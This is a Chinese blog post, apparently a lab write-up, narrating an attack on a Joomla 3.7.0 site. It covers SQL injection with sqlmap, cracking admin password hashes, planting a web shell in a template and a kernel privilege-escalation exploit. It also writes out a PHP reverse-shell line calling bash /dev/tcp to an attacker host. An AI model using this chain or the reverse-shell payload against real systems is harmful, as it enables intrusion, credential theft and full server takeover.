记一次对 Joomla CMS 渗透过程

2019年10月11日17:24:54 评论 125

首先,对其进行扫描
记一次对 Joomla CMS 渗透过程
发现其版本为 Joomla 3.7.0

于是,搜索这个版本的漏洞,,,
记一次对 Joomla CMS 渗透过程
发现存在SQL注入漏洞,继续查看详情
记一次对 Joomla CMS 渗透过程
上sqlmap跑一波,成功爆库。。。
记一次对 Joomla CMS 渗透过程
接下来,爆表
记一次对 Joomla CMS 渗透过程
爆用户名密码
记一次对 Joomla CMS 渗透过程
在线跑了一下MD5,实在是跑不出来,接下来试试John破解
记一次对 Joomla CMS 渗透过程
成功破解,得到密码,登录后台,进入模板写入一句话
访问:http://10.1.1.104/templates/protostar/shell.php 没有问题,菜刀连接
记一次对 Joomla CMS 渗透过程
查看权限,发现不是root
记一次对 Joomla CMS 渗透过程
接下来进行提权,首先我们查看系统版本,发现是Linux 4.4.0,查找一个这个版本的漏洞
试了好几个都不行,发现这个可以
记一次对 Joomla CMS 渗透过程
好,我们上传exp
记一次对 Joomla CMS 渗透过程
提权、、、、菜刀不好用,写一个反弹PHP文件,反弹回来一个shell
记一次对 Joomla CMS 渗透过程

<?php system("bash -c 'bash -i >& /dev/tcp/10.1.1.103/7777 0>&1'"); ?>

本地监听 7777 然后访问:http://10.1.1.104/templates/protostar/cmd.php成功反弹shell
记一次对 Joomla CMS 渗透过程
接着继续提权、、、运行如下两个文件

./compile.sh ./doubleput

记一次对 Joomla CMS 渗透过程
OK,提权成功。。。

http://www.oniont.cn/index.php/archives/250.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: